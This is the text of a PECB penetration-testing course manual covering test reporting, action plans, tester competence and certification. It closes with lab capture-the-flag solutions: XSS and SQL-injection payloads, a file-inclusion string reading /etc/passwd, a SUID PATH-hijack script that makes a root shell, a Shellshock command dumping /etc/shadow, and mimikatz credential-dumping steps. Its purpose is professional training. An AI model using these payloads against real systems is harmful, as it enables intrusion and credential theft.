Course 276 Exercise 4

Summary for Day 4
Section 14: Documentation of the test, quality review and report

Section 15: Action plans and follow up
Section 16: Managing a testing programme
Section 17: Competence and evaluation of testers
Section 18: Capture the flag exercise
Section 19: Closing the training
© 2015 PECB, Parker Solutions Group, Sysca Consulting

Version 1.2.2
Graeme Parker and Pablo Sisca (Editors)
Documents provided to participants are strictly reserved for training purposes and are copyrighted by Parker
Solutions Group and Sysca Consulting. Unless otherwise specified, no part of this publication may be, without the
written permission of Parker Solutions Group and Sysca Consulting be reproduced or used in any way or format
or by any means whether it be electronic or mechanical including photocopy and microfilm.
Licensed to Synergy Innovation Group (contact@synergy-innov.com)

©Copyrighted material PECB®. Single user license only, copying and networking prohibited. Downloaded: 2020-05-24
1/64
2/64
Penetration Testers must produce and keep work documents to support conclusions and engagement results. It
is important to note that the work documents shall:
1.Contain only facts: The tester shall document enough elements of proof to support the findings and provide
enough details to make it possible for another tester to evaluate the evidence collected.
2.Shall be written in an intelligible way: Notes shall be brief and precise, but the tester must ensure that their
content remains understandable for another tester. Thus, the tester can use abbreviations and write in “point
form” as long as the form is standardized and that the terminology is generally known to other testers.
3.Identify the weak points: Work documents shall enable the rapid identification of the weak points of the
tested system detailing how these were identified so they can be easily referenced and identified when
developing the report.

3/64
The use of the document example above is not a mandatory requirement or deliverable in a penetration test.
Maintaining such a log however during the test will make report writing easier, will reduce the risk of details being
overlooked and will support the tester in justifying the statements made in the report as actual point in time facts
can be referenced.
The table above illustrates a good example of a work document that the lead penetration tester can easily build
using an Excel file.
An OWASP Application Check List Spreadsheet can be found in the Supporting Folder material to illustrate other
examples used in the industry.
Supporting Material of how to build this checklist can also be found here:
http://mdsec.net/wahh/tasks.html
http://danielmiessler.com/projects/webappsec_testing_resources/
https://www.owasp.org/index.php/Testing_Checklist

4/64
The testing records represent the entire documentation generated from the information collected based on testing
activities. Drafts, copies, previous versions or any other document that is not related to the testing activities are
not generally kept as records.
The test records are kept at least until the completion of the testing, and then they are archived.
Subsequently, the other documents related to security (if provided e.g. in a whitebox test) still in the
possession of the tester, will be destroyed, returned to the client or archived based on the dispositions
agreed when the testing agreement was signed.
Members of the penetration testing team are responsible of ensuring an adequate level of protection of the
clients confidential information contained in the testing records.
Unless otherwise stated, the test records are the property of the organization conducting the tests; the other
documents are the property of the client.

5/64
Work documents are the first evidence during a penetration test. The peer quality review enables to ensure
compliance with test procedures by all team members. The review should be performed by an experienced Lead
Penetration Tester.
The verification of work documents is necessary to ensure that:
1.The test procedures used were appropriate and reliable.
2.The test procedures were used correctly.
3.The testers collected sufficient information to support their conclusions.
4.The test findings and conclusions are logical and objective.

6/64
7/64
The assessment report must be written in the language agreed to between the client and organization conducting
the tests. It has to be ensured that the wording of the report can be understood at first reading by people not
having participated in the test. This means that all the elements necessary for understanding the findings and test
conclusions should be reported. It is therefore essential for the tester to provide accurate and factual descriptions
of the circumstances (e.g. locations, quantities, etc.).
However, there is no use of producing an assessment report of 200 pages which will never be read.
Asking the right questions when reporting will also avoid a too technical, boring report or one where one is lost in
many irrelevant details in relation to the objectives of the test. So, before writing the report, the tester may ask
himself the following questions:
-Who are the primary readers of the report?
-How do they know the subject?
-To what perspective do they intend to use the report?
-At what level are they interested in the report?
-What would be their reaction to reading the message conveyed by the report?
It maybe necessary to create a business friendly summary report for executive management and a longer
technical report for the IT team. The main aim of any report however should be to ensure that the organization
and its members have a sufficient understanding of the problem to be able to have the ability to implement
corrective solutions.

8/64
Similarly, in terms of the overall quality of the document to be produced, the tester considers the different levels
of proofreading the report to structure it appropriately and that the message can pass to the client with all the
required clarity and accuracy. Usually for a test report three proofreading levels are identified: the report in
general, the paragraphs, the sentences and the tables.
General level of the report:
•Is the central message of the report understandable to the reader?
•Is the length of the report appropriate?
•Is there an executive summary at the beginning of the report?
•The division into chapters is sufficient and the titles are clear?
•Does the report contain suitable graphics (e.g. images, charts, diagrams)?
Paragraph level:
•Does the paragraph contain a central phrase that develops the main idea to be presented?
•Does the paragraph contain enough information to support the ideas presented in this central phrase?
•Does the paragraph contain too much information that will burden the reading and could prevent a correct
understanding?
•The ideas presented in the paragraph do they follow a logical sequence?
Sentence level:
•Are the sentences easy to understand?
•Are they not too long (too complex)?
•Do they contain too much technical vocabulary, words difficult to understand outside the context of the test?
•Do they contain action verbs and actors (an active structure is often preferable to the passive structure)?

9/64
10/64
11/64
For a complete overview of CVSS see: http://www.first.org/cvss/cvss-guide

12/64
The above scoring systems are very useful but one disadvantage when compared with CVSS is that they do not
consider impacts specific to an organisation as it is assumed that the impact is the same for all organizations.
Details of these schemes can be found at:
http://www.kb.cert.org/vuls/html/fieldhelp
http://www.sans.org/newsletters/risk/
http://technet.microsoft.com/en-US/security/gg309177.aspx
Important Note. We have described vulnerability scoring systems. These systems differ from
vulnerability databases and naming schemes which give common names to vulnerabilities. These
databases give rich information and try to assign common names for understanding but do not present
scores. Using these schemes is good however to gather and present technical knowledge and detail and
to define some consistent definitions. For more information see:
Common Vulnerabilities and Exposures: http://cve.mitre.org/about/index.html
National Vulnerability Database: http://nvd.nist.gov/
Open Source Vulnerability Database: http://osvdb.com/
Bugtraq: http://www.securityfocus.com/archive/1

13/64
•The test report shall be published within an agreed time period.
•The test report must be dated, verified and approved in accordance with the procedures of the test programme.
•The approved test report must be distributed to a list of recipients previously designated by the test client.
•The client and all recipients appearing on the list must respect and maintain the confidentiality of the report.
Important Note!! A penetration testing report contains details of organization and technical
vulnerabilities. In the wrong hands the report could almost be a guide as to how to compromise the
organization. Therefore penetration testers have a professional duty to ensure that the report is a)
distributed to only those individuals agreed in advance and b) distributed in a secure manner. The
technique for distributing the report should be agreed in advance with the client. This maybe
distributing the report using encrypted or a secure mail service, via physical secure delivery or some
other mechanism. Under no circumstances should a penetration testing report be sent from an external
email address in clear text or through the post/courier. Once the report is in the hands of the
organization it becomes their responsibility to handle the report in a secure manner, and the penetration
tester should stress the importance and sensitivity of the report.

14/64
15/64
16/64
If management, following the analysis, decides it accepts the risk instead of implementing corrective, preventive
or improvement actions, it must documented as per the organizations risk management process and risk
acceptance criteria.
Such plans can be submitted to the Penetration Tester for review, in order to allow suitable advice and guidance
to be given to the client.

17/64
18/64
A tester or consultant must always remember that it is very unlikely that an organization accomplish all
the improvements simultaneously. Each improvement requires the use of resources and requires time for
implementation. Action plans can be classified by order of priority by management, especially where investments
are required.

19/64
You have received a plan for corrective actions. Evaluate the adequacy of the proposed corrective actions. If you
agree with the corrective actions, explain why. If you disagree, explain why and propose what you think would be
adequate corrective actions.
1.A finding was raised because a Microsoft Windows server had over 12 months of patches missing.
Proposed action plan: Organise a formal change to apply all relevant patches and test accordingly.
2. A finding has been raised because the tester could boot an internal PC into LINUX using a CD and then
override local security settings. They could also steal the Windows SAM file and crack passwords offline.
Proposed action plan: Disable the ability to boot from the CD rom on the PC.
3. A finding has been raised because the tester could access resources on the local CITRIX server by using the
command line. The CITRIX server was meant to host a specific application and a standard user should not have
access to the command line. Through this the tester (with a standard user logon account) managed to access a
number of local files on the server which contained highly sensitive information.
4.

20/64
4. A finding was raised because the penetration tester was able to obtain a number of passwords through social
engineering. The tester made telephone calls to a number of users profiled through social networking sites, in the
calls he posed as a member of IT support stating the passwords were required for emergency support work.
Proposed action plan: Send an email to all staff reminding them never to reveal passwords to anyone including IT
support.
5. Several findings were raised because the penetration tester was able to gain unauthorised access to a key
office. Once in the building they were able to freely sit at a desk, connect their machine and conduct a number of
activities such as sniffing local network traffic. During this sniffing exercise they captured credentials to a number
of key systems. When accessing the building they reported to the main reception and claimed to be an IT support
engineer. They were immediately sent to the relevant floor of the office. They were then allowed through the main
door of the office by tail-gaiting a member of staff who had a key fob access card.
Proposed action plan: Several actions have been proposed by the client:
Implement a procedure where all visitors to the main reception are reported to a relevant contact in the office.
The office contact will be required to collect the visitor from reception hand them a visitors badge, check
their ID and escort them at all times.
Send an email to all staff reminding them of the risks of tailgating.
Implement MAC address filtering to prevent unauthorized machines from connecting to the network.

21/64
22/64
Although the information in this section are applied to internal penetration testing, the elements of an effective
test programme are essentially the same for tests conducted by third parties. Tools, procedures and techniques
are essentially the same.

23/64
24/64
25/64
In organizations employing a full-time team of internal testers, it is desirable to implement a continual internal test
programme. To implement such a program, the conditions are:
•High level of automation;
•Respect for important guidelines;
•Automated process producing information rapidly related to the topic;
•Alarms for the triggering of a failure;
•Automated test tools;
•Automated reporting;
•Competent testers;

26/64
An organization that implements an test programme (internally or externally) must make sure to provide the
necessary resources for its operation including:
1. Financial resources necessary to develop, implement, manage and improve the test activities.
2. Competent personnel (testers and technical experts) to conduct the tests.
3. Tools (computers, software, etc.).
4. Test policies and procedures.
5. Logistics (transportation, accommodations and other needs related to the test).

27/64
The effectiveness and efficiency of a penetration testing programme is based on the performance of each
tester, each team and the test department.
The goal of the test performance verification is to determine if the test programme meets the expectations of the
organization and was conducted according to industry practices. It can be performed according to a formal
evaluation method, by independent review or by the analysis of performance indicators.
The goal in the verifications of the testers work is to evaluate the performance and competencies of the testers. This
can be done thanks to the review and analysis of annual evaluations.
The goal in the interpretation of the improvement of contributions is to evaluate the improvement achieved by the test
programme to contribute to the test firm’s performance.

28/64
29/64
30/64
The confidence and reliability granted to the penetration testing process depends on the competence of the
personnel who conduct the test. This competence is based on the demonstration of each tester’s personal
qualities and their ability to apply the test principles. The competences of testers are based on a rigorous learning
process and the maintenance of competences: initial training, continual training and professional experience.
Some knowledge and skills are common to testers of all management systems, whereas others are specific to
testers in each discipline.

31/64
ISO 19011, clause 3.17: Competence
Ability to apply knowledge and skills to achieve intended results.
Note: Ability implies the appropriate application of personal behavior during the test process.
The three dimensions of competence are:
1.Knowledge: knowledge is the acquaintance with facts, truths, or principles, as from study or investigation that
is held by the individual. It is the mastery of the concepts and theoretical knowledge.
2.Skill: Skills are usually related to practical competences and expertise of the individual.
3.Attitude: Attitude is tied to the ability to adapt to different situations and to adjust your behavior according to
the characteristics of the environment, the situation and the others.
Note on terminology:
•“Theoretical competence” and “Cognitive competence” are synonyms for knowledge.
•"Practical competence” and “Functional competence” are synonyms for skill.
•"Behavioral Competence” and “Social competences” are synonyms for attitude.

32/64
Penetration Testers should possess the necessary qualities to enable them to act in accordance with the ethical
and professional principles discussed in this course. These skills include:
•ethical, i.e. fair, truthful, sincere, honest and discreet;
•open-minded, i.e. willing to consider alternative ideas or points of view;
•diplomatic, i.e. tactful in dealing with people;
•observant, i.e. actively observing physical surroundings and activities;
•perceptive, i.e. aware of and able to understand situations;
•versatile, i.e. able to readily adapt to different situations;
•tenacious, i.e. persistent, focused on achieving objectives;
•decisive, i.e. able to reach timely conclusions based on logical reasoning and analysis;
•self-reliant, i.e. able to act and function independently whilst interacting effectively with others;
•acting with fortitude, i.e able to act responsibly and ethically even though these actions may not always be
popular and may sometimes result in disagreement or confrontation;
•open to improvement, i.e. willing to learn from situations, striving for better test results;
•culturally sensitive, i.e. observant and respectful to the culture of the client;
•collaborative, i.e. effectively interacting with others, including test team members and the client's personnel.

33/64
It is appropriate that Penetration Testers possess knowledge and aptitudes in the following fields.
1.Test concept: test principles, procedures and techniques:
•Understand and explain the key purpose and business benefits of penetration testing.
•Ability to identify, analyze and evaluate the compliance requirements for an organization which could be
supported through penetration testing.
•Ability to explain and illustrate the main concepts in penetration testing and the relationship with Information
Security Risk Management.
•Understanding the differing types of penetration test including black box, white box, grey box, announced, un-
announced, internal, external, manual and automated and when to use these approaches
•Understand of the phases of a penetration test
•Understanding of the relevant legal, regulatory, contractual and ethical issues related to Penetration Testing
•Understanding of the success factors for Penetration Testing exercises.
2. Technical Knowledge:
•Ability to understand network protocols based on TCP/IP and their basic operation.
•Ability to understand the operation of DNS
•Ability to conduct port scans to identify operating services
•Ability to understand the Microsoft Windows Architecture and the ways in which Windows can be exploited
•Ability to understand the LINUX Architecture and the ways in which LINUX can be exploited
•Ability to understand network infrastructure vulnerabilities and how network devices can be exploited
•Ability to understand wireless vulnerabilities and how wireless networks can be exploited
•Ability to understand web application vulnerabilities and how applications can be exploited
•Ability to understand mobile device vulnerabilities and how such devices can be exploited
•Ability to understand the fundamentals of Trojans and Backdoors
•Ability to conduct basic packet sniffing and network traffic analysis

34/64
3. Laws, regulations and other applicable requirements relevant in an test:
•Know the main codes, laws, regulations applicable to the test (at the local, regional, national or international
levels).
•Be able to read and understand commercial contracts and agreements between organizations.
•Know the routine operation of the management and application of the internal policies of the organization.
4. Organizational processes:
•Understand the routine operation of an organization (structure, functions, hierarchy, etc.).
•Understand the main processes (human resources, accounting, production, public relations, sales, etc.) present
in an organization as well as the associated terminology.
•Understand the cultural and social context of an organization as well as the human dynamics connected to
them.
5. Risk management:
•Understand and evaluate the risks related to technical, physical and organisational vulnerabilities.
•Understand, evaluate and manage test risks.

35/64
36/64
The main Penetration Tester credentials:
1.The credential “Certified Provisional Pen Test Professional” recognizes that the person has the basic
knowledge about testing and that he can be member of a Penetration Testing Team.
2.The credential "Certified Pen Test Professional" recognizes that the person has the knowledge necessary
to participate in a penetration test and that he has the basic skills to conduct a elements of a Penetration
Test.
3.The credential “Certified Lead Pen Test Professional” recognizes that the person masters the knowledge of
Penetration Testing and demonstrates the competencies of a professional penetration tester along with the
abilities to manage a team of Testers.

37/64
Passing the exam is not the only pre-requisite to obtain the professional certification “Certified Lead
Penetration Tester”. This professional certification will endorse both the passing the exam and the validation of
the professional experience records. Unfortunately, many people claim they are Lead Penetration Tester
following a successful exam, although they don’t have the required experience level.\
Important note: Certification fees are included in the examination price. The candidate will therefore not have to
pay any additional costs when applying for certification at their corresponding experience level and receive one of
the professional credentials: Certified Lead Penetration Tester, Certified Penetration Tester or Certified
Provisional Penetration Tester.

38/64
The objective of the certification examination is to ensure that Certified Lead Penetration Tester candidates have
mastered test concepts and techniques so that they are able to participate in test assignments. The PECB
examination committee shall ensure that the development and adequacy of the exam questions is maintained
based upon current professional practice. The questions were developed by a group of security specialists that
are all Certified Lead Pen Test Professional certified.
The exam only contains essay questions. The duration of the exam is 3 hours. The minimum passing
score is 70%.
All notes and reference documents may be used during the exam excluding the use of a computer.
The exam is available in several languages. When taking the exam, please ask the trainer or check the
“examination” section on the PECB website to know the list of available languages.
All seven competency domains are covered by the examination. To read a detailed description of each
competency domain, please visit the PECB website.

39/64
At the end of this training you will receive a document that certifies your course attendance and 31 Continuing
Professional Development (CPD) credits. This certificate attests only that the participant has attended the training
and not his success at the certification exam.

40/64
The correction of each exam is conducted by qualified correctors assigned anonymously. To ensure
independence, impartiality and absence of conflicts of interest, trainers and supervisors do not participate in the
review process of exams, or in the certification process of candidates.
Applicants will be notified by email within 4 to 8 weeks after the exam of their results. The possible outcomes are
either: PASS or FAIL. No numerical score or detailed correction keys will be sent to the candidate.
Important Note: Upon successful exam completion you will receive an examination number via email
along with instructions on how to apply to become a PECB Certified Pen Test Professional. The
credential certificate is issued only at the end of the certification process.
In the situation that a candidate fails the examination, an explanation will be provided about the areas where he
has failed to demonstrate the required competence. The candidate has twelve (12) months to do a re-
examination. To do this, the candidate must contact the head of the training organization to plan the exam. The
re-examination is free. However, the supervision costs of examination may be applicable.

41/64
After successfully passing the exam, the candidate has a maximum period of three years to submit a professional
file to obtain a professional credential related to the ISO 27001 certification scheme. A candidate may apply at the
same time for more than one professional credential related to the ISO 27001 certification scheme (e.g. Lead
Implementer, and Master) if all requirements are met.
At your application, you must provide the following information:
1. Your contact details
•Make sure to write correctly (in ASCII format) your name as you wish it to appear on your certificate.
2. Your professional experience and test experience
•You must provide a resume to present your experience. Work experience can be any activity showing that you
have skills and general knowledge of the functioning of a organization.
•For testing experience, be sure to indicate the number of hours completed.
•No equivalence is granted for work experience and test. Education degrees do not replace the real experience
of work.
3. At least three references
•References must be people you know personally. They can be colleagues, partners, supervisors, employees
under your direction, etc.. The important is that these people know you enough to attest to your qualifications.
•Since your application will not be assessed as at least two references have been completed, it is preferable to
provide the maximum of 5.

42/64
If you have any concerns or questions regarding your professional experience and its eligibility please contact
certification@pecb.org for further assistance.

43/64
References will be contacted to complete a short questionnaire in order to attest of your experience and evaluate
your personal qualities (according to 13 professional behavioral skills defined by ISO 19011). A random sample
of references will be contacted by phone.
You can validate if your references have responded on your PECB member account. If your respondents are late,
you should follow up with them to ensure they have received the reference request.
In the situation that PECB is unable to contact one of your references or the questionnaires were not answered,
you will be asked to provide further references.

44/64
When the candidate is certified he receives, by electronic transmission, the PECB certificate valid for three years.
After this period it will be renewed if the applicant meets the conditions for maintaining his professional
designation.

45/64
46/64
47/64
Section summary:
1.The confidence and reliability granted to the test process depend on the competence of the personnel who
conducts the test.
2.The competence of testers is based on the demonstration of the personal qualities of each tester and their
capability to apply the test principles. The competence of testers rests on a rigorous learning process and
maintenance of competencies: the initial training, continuous training and professional experience.
3.Certain knowledge and aptitudes are common to testers of all management systems, whereas others are
specific to testers of each discipline.
4.The certification body must have processes that give them the guarantee that the personnel have the
necessary knowledge to execute its mission.
5.It is appropriate that testers possess personal qualities that will allow them to act in accordance with the test
principles.
6.It is appropriate that the testers possess the knowledge and aptitudes in the following fields: test principles,
procedures and techniques, management system, organizational process, legal aspects (laws, regulations
and other applicable requirements relevant in tests) and risk management.
7.The candidate for an test certification (except for the provisional status) must prove his qualifications
(education, training and work experience) based on the requested professional designation.
8.The tester should maintain a log of his tests to be able to substantiate his professional experience.

48/64
49/64
Working in pairs – This activity can be used as a mock exam as well! It should take roughly 1 hour.
Videos with the solution and exploitation are also provided.
Please allow 15 minutes after showing the videos for the students to be able to reproduce these exploitable
scenarios.
•Webapp-LocalFileAccess.avi
•Webapp-ReflectedXSS.avi
•Webapp-SQLiLogin.avi
•Webapp-StoredXSS.avi
Solutions
1. Reflected XSS on homepage - Search box is vulnerable and takes a standard XSS exploit vector, eg:
<script>alert()</script>
2. Stored XSS - The comment parameter in the guestbook is vulnerable to stored XSS. Standard vector eg:
<script>alert()</script>
3. SQL injection - The username parameter of the login page is vulnerable. eg: ' OR 1=1#
4. Local File Access - The page param of the admin URL is vulnerable and can be exploited by:
/admin/index.php?page=/etc/passwd%00

50/64
Working in pairs – This activity can be used as a mock exam as well! It should take 1 hour.
The last two “Capture the Flag” activity has two videos to present the students if after 30 minutes they couldn’t
find their way to exploit the system.
Please allow 15 minutes after showing the videos for the students to be able to reproduce these exploitable
scenarios.
* Linux-SUID-Path.avi
* Linux-Shellshock.avi
A) Simple Brute force scenario to see if the students can use Pen Testing tools:
SSH open - msfadmin has password 'password'
B) SETUID exploit:
find sgid or suid files using the following:
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
look at binary to see if you can figure out what it does:
run strings on the binary
run strace (specifically strace -qfeexecve (to see what other programs it calls)
look at permissions of other programs
if system binaries are called, look at how they are called and if you can change PATH variable to exploit them
change PATH to "." and drop in custom "ls" file
containing the following

51/64
/bin/cp /bin/sh /tmp/sh
/bin/chown root /tmp/sh
/bin/chmod 6555 /tmp/sh
suid root shell needs to be called 'sh' or run with '-p' param to get past bash protection (drops root privileges on
shells when run with suid)
c) SHELLSHOCK exploit:
wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/shadow" http://127.0.0.1/cgi-
bin/test.cgi
apache user www-data was added to shadow group to be able to read shadow file
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
Online Check for Shellshock
http://bashsmash.ccsir.org

52/64
Working in pairs – This activity can be used as a mock exam as well! It should take 1 hour maximum.
172.16.0.51 - PECB-win7.sys.lab
172.16.0.52 - PECB-DC.sys.lab
syslab\john.smith - Qazwsx12+1
syslab\jack.russell - Qazwsx12+1
---
Exploit - Old and vulnerable version of TFTPDWin is installed on PECB-Win7. Metasploit has a stable exploit for
this granting Admin privileges
Priv esc - Unquoted service binary path. A dummy service has been installed that is running with SYSTEM
privileges and uses an unquoted service binary path.
Mimikatz to get plaintext domain password from memory:
To set this up - open \\pebc-dc and login with syslab\jack.russell

53/64
launch mimikatz then type privilege::debug - sekurlsa::logonpasswords
https://github.com/gentilkiwi/mimikatz/releases/tag/2.0.0-alpha-20150419a
Ask for debug privilege for mimikatz process.

The debug privilege allows someone to debug a process that they wouldn’t otherwise have access to. For
example, a process running as a user with the debug privilege enabled on its token can debug a service running
as local system.
from: http://msdn.microsoft.com/library/windows/hardware/ff541528.aspx
mimikatz # privilege::debug
Privilege '20' OK
Remark: ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 means that the required privilege
is not held by the client (mostly you're not an administrator )
When working with lsass process, mimikatz needs some rights, choice:
Administrator, to get debug privilege via privilege::debug

SYSTEM account, via post exploitation tools, scheduled tasks, psexec -s ... - in this case debug privilege is not
needed.
Without rights to access lsass process, all commands will fail with an error like this: ERROR
kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) (except when working with a minidump).
So, do not hesitate to start with:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # log sekurlsa.log

Using 'sekurlsa.log' for logfile : OK
...before others commands

54/64
Section summary:
1.The confidence and reliability granted to the test process depend on the competence of the personnel who
conducts the test.
2.The competence of testers is based on the demonstration of the personal qualities of each tester and their
capability to apply the test principles. The competence of testers rests on a rigorous learning process and
maintenance of competencies: the initial training, continuous training and professional experience.
3.Certain knowledge and aptitudes are common to testers of all management systems, whereas others are
specific to testers of each discipline.
4.The certification body must have processes that give them the guarantee that the personnel have the
necessary knowledge to execute its mission.
5.It is appropriate that testers possess personal qualities that will allow them to act in accordance with the test
principles.
6.It is appropriate that the testers possess the knowledge and aptitudes in the following fields: test principles,
procedures and techniques, management system, organizational process, legal aspects (laws, regulations
and other applicable requirements relevant in tests) and risk management.
7.The candidate for an test certification (except for the provisional status) must prove his qualifications
(education, training and work experience) based on the requested professional designation.
8.The tester should maintain a log of his tests to be able to substantiate his professional experience.

55/64
56/64
We strive to constantly improve the quality and the practical relevance of our training. Accordingly, your opinion
on the training that you have just followed is of great value to us.
We would be very grateful if you could provide us with your evaluation related to the following characteristics of
the training and instructors.
Also, if you have suggestions for improving PECB’s training materials, we'd like to hear from you. We read and
evaluate the input we get from our members. Please open a ticket directed to Training Department on PECB’s
website in the Contact Us section.
In case of dissatisfaction with the training (trainer, training room, equipment,...), the examination or the
certification processes, please open a ticket under “Make a complaint” category on PECB’s website in the
Contact Us section.
After participating in this training, participants will receive a certificate of 31 CPD (Continuing Professional
Development) credits via e-mail.

57/64
58/64
As described during the course there are many areas of penetration testing in which a professional can
specialize. PECB offer the following specialist Lead Penetration Tester Courses:
Infrasructure Specialist: An Infrastructure Specialist focuses on the testing of core elements of infrastructure
such as network devices, wireless, servers and cloud environments. This course gives the candidate a full
understanding of how to effectively test infrastructure using specialist techniques and tools building on the
principles from the Certified Lead Pen Test Professional course.
Web Application Specialist: More and more applications are now becoming web based and available online.
A web application penetration testing specialist will be equipped with all the skills to analyse a web application
and identify attack vectors and vulnerabilities. This course will focus on the techniques and skills need to
understand and exploit web applications and will include a deep dive of the guidance from the Open Web
Application Security Project (OWASP).
Mobile Specialist: As organisations utilize mobile technologies and applications more and more including smart
phones and tablets, this course focuses on how to test the security of such devices and the applications deployed
on them. The course will identify the tools and techniques used to test and exploit such devices.
Social Engineering Specialist: Being able to gain access to information, targets and credentials without
conducting technical hacking is a specialist skill in its own right. Often social engineering is used in most real
world cybercrimes, whether in person, via the telephone or via electronic means such as email or instant
messaging. This course will teach you the psychological elements, physical perimeter security and hardware
tools, techniques and skills used in social engineering and how these can be used in a penetration test to really
understand the vulnerabilities faced by an organisation.

59/64
Certified Lead Forensics Examiner (5 days)
The Certified Lead Forensics Examiner course allows a person to learn the basic skills employed by a
professional forensics examiner. The course covers the fundamentals of forensics, how to organise and lead a
forensics examination and how to apply these techniques in relation to a variety of technologies and
environments. The skills learned in this course are complimentary to the Certified Lead Penetration Tester as a
skilled tester usually has the skills and knowledge to conduct investigations relating to real security breaches.
Certified Risk Manager ISO 27005 (2 days)
The ISO 27005 training “Certified Risk Manager” allows a person to become proficient in the fundamental
elements related to the management of risks related to information: planning of a risk management programme,
analysis, evaluation, risk treatment, risk communication and surveillance. Through readings, class exercises
based on real cases, discussions and demonstrations with risk modeling tools, the participant will be able to
perform an optimal risk evaluation and to manage risks through time by knowing its lifecycle. Please note that
this training perfectly follows the framework of an ISO 27001 standard implementation process.

60/64
61/64
62/64
Page for Note Taking

63/64
Page for Note Taking

64/64

Course 276 Exercise 4

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Course 276 Exercise 4

Uploaded by

Copyright:

Available Formats

Summary for Day 4

Section 14: Documentation of the test, quality review and report

© 2015 PECB, Parker Solutions Group, Sysca Consulting

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Mimikatz to get plaintext domain password from memory:

To set this up - open \\pebc-dc and login with syslab\jack.russell

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Ask for debug privilege for mimikatz process.

Administrator, to get debug privilege via privilege::debug

mimikatz # log sekurlsa.log

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Certified Risk Manager ISO 27005 (2 days)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

Licensed to Synergy Innovation Group (contact@synergy-innov.com)

You might also like